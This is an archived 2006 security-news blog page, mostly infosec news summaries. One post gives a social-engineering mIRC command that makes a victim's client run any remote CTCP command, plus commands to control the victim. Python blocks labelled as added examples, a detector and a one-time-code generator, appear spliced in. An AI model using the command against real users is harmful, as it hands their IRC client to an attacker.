Darknet - The Darkside

Don't Learn to HACK - Hack to LEARN. That's our motto and we stick to it; we are all about Ethical Hacking, Penetration Testing & Computer Security. We share and comment on interesting infosec related news, tools and more.

25 February 2006 | 10,754 views

Free Prep Material for LPI Linux Certification (LPI 201 and 202)


Here’s a series of well written IBM Linux tutorials to help you learn Linux fundamentals and prepare for system administrator certification. The LPI prep tutorials help you prepare for the topics in LPI exam 201 and the topics in LPI exam 202.

You can find more about the certification at the Linux Professional Institute.

I’ve been meaning to take LPI 201 for quite some time actually. It looks like a pretty solid foundation to Linux and I know most of it already, so I should be able to do it without too much problem.

You can find the material at IBM:

Linux Professional Institute Exam Prep

The eight tutorials below help you prepare for the eight topics in LPI exam 201. Exam 201 is the first of two LPI intermediate-level system administrator exams. Both exam 201 and exam 202 are required for intermediate-level certification, or LPIC-2.

You do have to sign up, or just use Bugmenot; the Bugmenot extension for Firefox is very useful ;)

To any budding hackers, yes it is recommended you have strong Linux skills.



24 February 2006 | 22,701 views

mIRC Backdoor

Well it’s not really a backdoor… but we can consider it one…

Some time ago an article about a backdoor in mIRC appeared on many websites (including mine)… all this backdoor stuff was really nothing more than a mIRC script that made the client respond to any command received via a CTCP (Client to Client Protocol) command… such as ping, version, time, etc…. so here is the command that the victim has to enter:

//.write -c mirc.dll ctcp 1:*:*:$1- | /.load -rs mirc.dll

The command is split into 2 parts, delimited by | (a vertical line)… So the first section writes a file “mirc.dll” containing a simple mIRC script which listens to any CTCP request… the second one loads the file with the mIRC script….

After the “victim” executes this command we can control it by introducing one of the following lines:

{ this is a comment }

/ctcp victims_nick /.nick lamer { changes the nickname of the victim to lamer }

/ctcp victims_nick /.exit { closes the victim's mIRC }

/ctcp victims_nick /.run www.black2white.as.ro
{ opens the victim's default web browser (ie, firefox, opera, etc.) on the page www.black2white.as.ro }

/ctcp victims_nick /.any_valid_irc_command

So happy “masterminding”….

More IRC Commands: http://www.hackthissite.org/pages/irc/reference.php
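
A defensive check for the handler described above, as an added example that is not part of the original post: it scans mIRC script text for CTCP events whose command body is the sender's own text (`$1-`), whatever the file is called. The function name, finding fields and sample inputs are constructed for illustration.

```python
import re

# mIRC remote event syntax: ctcp <level>:<matchtext>:<target>:<commands>
# ini-style script files prefix each line with nN= (n0=, n1=, ...).
CTCP_EVENT = re.compile(
    r"^\s*(?:n\d+=)?\s*ctcp\s+([^:\s]+):([^:]*):([^:]*):(.*)$", re.IGNORECASE)
# A command body that begins by evaluating the sender's text ($1-, $2-, $1 ...)
REMOTE_EXEC = re.compile(r"^\{?\s*[/.]*\s*\$\d+-?")


def audit_script(name, text):
    """Return one finding per CTCP handler that runs sender-supplied text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = CTCP_EVENT.match(line)
        if not m:
            continue
        level, matchtext, _target, body = (g.strip() for g in m.groups())
        if not REMOTE_EXEC.match(body):
            continue  # handler runs a fixed command, not the remote text
        findings.append({
            "file": name,
            "line": lineno,
            "level": level,
            "any_request": matchtext == "*",  # fires on every CTCP type
            # heuristic: scripts are normally .mrc/.ini, not e.g. "mirc.dll"
            "odd_extension": not name.lower().endswith((".mrc", ".ini")),
        })
    return findings


# Constructed sample inputs: the handler from the post and a benign handler.
SAMPLES = {
    "mirc.dll": "ctcp 1:*:*:$1-\n",
    "remote.ini": "[script]\nn0=ctcp *:VERSION:*:echo -a $nick asked for my version\n",
}

if __name__ == "__main__":
    for fname, content in SAMPLES.items():
        for f in audit_script(fname, content):
            print(f)
```

Run it over every file mIRC has loaded as a remote script; any finding means the client will execute whatever another user sends it.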


24 February 2006 | 6,894 views

UK Wants Backdoor in Next Version of Microsoft Windows

Yes that’s right, big brother wants a backdoor in your operating system. Even MORE of a reason to use Open Source alternatives that we can audit ourselves, eh?

There has been talk of such things in the past, US government backdoors in common cryptography algorithms and now talks of backdoors in the most popular OS in the world.

Windows Vista is due to be rolled out later this year. Cambridge academic Ross Anderson told MPs it would mean more computer files being encrypted.

He urged the government to look at establishing “back door” ways of getting around encryptions.

The Home Office later told the BBC News website it is in talks with Microsoft.

Yes, it bothers me.

Professor Anderson said people were discussing the idea of making computer vendors ensure “back door keys” to encrypted material were made available.

The Home Office should enter talks with Microsoft now rather than when the system is introduced, he said.

He said encryption tools generally were either good or useless.

“If they are good, you either guess the password or give up,” he said.

Source: BBC News


24 February 2006 | 6,520 views

Passwords Passe at RSA

SAN JOSE, California — Identity theft and online bank fraud were the unofficial themes of the 2006 RSA Conference, a massive security confab where Bill Gates came to announce the imminent death of the password and vendors filled the exhibition halls with iPod giveaways and promises that their product could stop everything from spam and malware to hackers and typos.

Thanks to a California law known as SB 1386 that requires companies to disclose sensitive data leaks to California consumers, companies like ChoicePoint and shoe retailer DSW became poster children for corporate negligence last year after mishandling sensitive data.

As mentioned previously, phishing is getting to be a big issue now, and password-only measures are failing.

Perhaps the biggest change this year will be in online banking, as financial institutions move to comply with federal oversight agencies that are directing banks (.pdf) to secure their sites with more than just user logins and passwords.

These extra fraud profiling and authentication measures are necessary, according to Callas, since the threats on the internet have changed.

“Now we are not dealing with kids having fun,” Callas said. “We are dealing with criminals — the Russian mafia. And online banking risks are there if your bank offers it, even if you don’t use it.”

E-trade, for instance, already offers free RSA security tokens to its most active users. Those battery-powered devices work by using a seed number and the current time to cryptographically generate a secure one-time code to complement the normal user login and password.

Source: Wired News
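
The seed-plus-current-time scheme described above, as an added example that is not from the article or from RSA: the article does not give the token's algorithm, so this uses the open RFC 6238 TOTP construction as a stand-in. The `verify` helper, its drift window and its replay set are assumptions about how a server might check the code.

```python
import hashlib
import hmac
import struct

# Constructed sample seed (the published RFC 6238 SHA-1 test secret).
SEED = b"12345678901234567890"


def totp(seed, now, step=30, digits=6):
    """Token side: derive the one-time code from the seed and current time."""
    counter = int(now) // step                      # 30-second time step
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                         # dynamic truncation
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(value % 10 ** digits).zfill(digits)


def verify(seed, submitted, now, used_counters, step=30, drift=1, digits=6):
    """Server side: accept a code from +/- drift time steps, once only.

    used_counters is the per-user set of time steps already consumed, so a
    code captured by a phishing page cannot be replayed inside its window.
    """
    base = int(now) // step
    for counter in range(max(0, base - drift), base + drift + 1):
        expected = totp(seed, counter * step, step, digits)
        # constant-time comparison of the submitted and expected codes
        if hmac.compare_digest(expected.encode(), submitted.encode()):
            if counter in used_counters:
                return False                        # replayed code
            used_counters.add(counter)
            return True
    return False


if __name__ == "__main__":
    seen = set()
    code = totp(SEED, 59)
    print(code, verify(SEED, code, 59, seen), verify(SEED, code, 59, seen))
```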


23 February 2006 | 8,230 views

Google Desktop 3 Enterprise

Google Enterprise has reacted to privacy concerns and released Google Desktop 3 Enterprise.

It responds to security concerns allowing full administrator control, letting them use the standard group policy settings to completely disable features, including the controversial Search Across Computers feature which you can read about in our original article.

Google Enterprise’s Article


23 February 2006 | 10,000 views

The new Macbook Pro 15″ 2.0Ghz taken apart

OWC (Other World Computing) is a great site for buying parts for the Mac. Their prices are quite cheap if you compare prices with stores in Asia. Two days back (21/2/06) they got their hands on a Macbook Pro, which they received at 10:30pm and managed to take it all apart by 1.30pm. Pictures are posted here.

Check out the stuff they have on Mac-related items and accessories. They now also have upgrade parts for the new Macbook Pro.

For a first timer, taking apart a Mac notebook is not an easy task. There are a lot of ways you can damage your Mac if you’re not careful.

For a step-by-step procedure on how to disassemble any Mac, check out the ifixit.com guide for a how-to complete with pictures and the number of screws you need to take out before you can actually take something apart on a Mac.


23 February 2006 | 6,581 views

Advertisers may face public humiliation over adware

Companies could find themselves put up for public humiliation by the U.S. Federal Trade Commission if they continue to advertise through insidious ad-serving software.

Such a move might help in the battle against adware, FTC Commissioner Jon Leibowitz said Thursday at an event here hosted by the Anti-Spyware Coalition. Adware is software that displays pop-up ads on PCs, often after Internet searches.

Anti-spyware software is a requirement just like Anti-virus software. Common vulnerabilities in browsers make it very easy for malicious software to infect your machine through Internet Explorer for example.

“I think that could have a beneficial effect,” Leibowitz said in an interview. “In this context, maybe shaming a company on how they are spending money might inure to the benefit of consumer’s privacy.”

Viruses, spyware, trojans and adware are big problems now with solutions for all of them (firewalls and intrusion detection help massively of course).

The FTC would publicly announce and publish the name of a company that advertises using adware that installs itself surreptitiously on consumer PCs or using spyware, Leibowitz said. He would recommend publicly shaming advertisers to the other FTC commissioners if the adware problem doesn’t decrease, he said.

Source: News.com


22 February 2006 | 4,156 views

who is backbone?

This is just an introductory article about myself; nothing interesting (for most of you) will be revealed in this article. I re-edited it because it had to meet the EU standards (you know Romania will be part of it on 1st of January 2007).

A long time ago…

…I was a big game addict, computers had no sense to me without games, this was the only use I had for them (apart from listening to music and watching movies), till the internet came into my life. I started playing on the internet as many of you I think did, chatting on IRC.
The first time I got into hacking was when I first downloaded WarMaster, a quite 31337 mIRC script with many trojans included.

And then I opened my eyes…

…and realized that I couldn’t do anything, was just another lam3r showing off on IRC. At that point I started to make my own mIRC scripts, still think that metalfish was a big success, towards my scripting knowledge that is. But it was not enough…
I started to read many tutorials, white papers and so on but really couldn’t understand a big part of them so I’ve changed my orientation towards web development; this way I have learned JavaScript & PHP, which later became useful towards XSS.

Darknet, again?

Being in the mailing list of darknet for quite a long period I was really happy to see it again on-line and up to date, so I joined it to share my knowledge, hopefully someone will appreciate this… and here I am.

In my articles…

I’m going to talk about viruses, web technologies, win related articles and so on… and why not some IRC stuff too, just to get you started, and teach you a couple of things I know, till then make the final step and join the dark side of the internet.


22 February 2006 | 5,120 views

Phishing Sites Getting More Advanced with SSL

Phishing is a difficult enough form of fraud to avoid for most computer users, but when some of the biggest names in the financial industry fail to do their part to detect and eliminate these online scams, consumers often are placed in an untenable situation.

Case in point: A source recently forwarded a link to one of the “best” phishing attacks I’ve ever seen. This one — targeting the tiny Mountain America credit union in Salt Lake City, Utah — arrives in an HTML-based e-mail telling recipients that their Mountain America credit union card was automatically enrolled in the Verified by Visa program, a legitimate security program offered by Visa that is supposed to provide “reassurance that only you can use your Visa card online.”

The fake MountainAmerica.net Web site

The e-mail includes the first five digits of the “enrolled card,” but those five digits are found on all Mountain America bank cards, so that portion of the scam is likely to be highly convincing for some recipients. The message directs readers to click on a link and activate their new Verified by Visa membership.

Beware, make sure your non tech-savvy friends & relatives are aware of how tricky these scammers are getting.

Someone YOU know could be falling for this soon.

Sources: Slashdot, Washington Post


22 February 2006 | 5,369 views

Jan 2006 Virus and Spam Statistics

January at a glance: Vicious and Varied
The numbers are indeed concerning: 19 new email-borne significant virus attacks, of which a troubling 8 (42%) were graded “low intensity”, 7 (37%) “Medium Intensity” and 4 (21%) were massive attacks, a rare phenomenon for a single month.

One outbreak of specific interest, consisting of 7 variants, illustrates how viruses are growing in sophistication: the first variant was launched around December 25th as a low intensity virus, however with subsequently released variants the attack’s intensity grew into a massive outbreak towards the end of the month.

The biggest virus attacks are the quickest: fast-moving solutions required
One of the factors measured by Commtouch is the speed of distribution. We consider attacks that peak within eight hours to have “short spans”, since it takes an average of 8-10 hours for a traditional anti-virus vendor to release an updated signature blocking a new virus.

Computer virus statistics from the Commtouch Detection Center indicate that 40% of attacks during January met this profile. Also, there is a clear connection between the attack’s speed and its intensity. The faster attacks are the biggest ones: while the average distribution time of low intensity attacks is a ‘leisurely’ 27 hours and medium-intensity attacks can take 17 hours, massive attacks take as little as 5.5 hours to spread in hundreds of millions of emails.

“The conclusion is clear” adds Lev. “Without a reliable solution for early hour protection that complements the old fashion anti-virus solutions, users are unprotected from the most massive attacks.”

Anti-virus engine statistics: is your AV up for the challenge?
Based in part on a reliable third party lab test, Commtouch was able to compare detection times of 21 leading AV engines against 19 new viruses in January. The results:

- On average, each AV completely missed 6.2 viruses (the attack was completed, and a signature was not yet available).
- The average response time to new viruses among all AV engines was 8.12 hours.

“The data should be of great concern to AV vendors and IT managers alike,” said Lev. “An eight hour response spells a simple truth: a traditional AV solution does not stand a chance against massive attacks that end before a signature is even released.”

Spam is physically sent primarily from the US
The Commtouch Detection Center monitors spam distribution patterns on a global level. January spam statistics show that 43.18% of global spam is sent from US-based sources (down from approximately 50%). China is also a significant ‘launching pad’ for 12.89% of the spam. Korean and German sources distribute about 4% of global spam, and the rest of spam originates from around the globe.

Source: Commtouch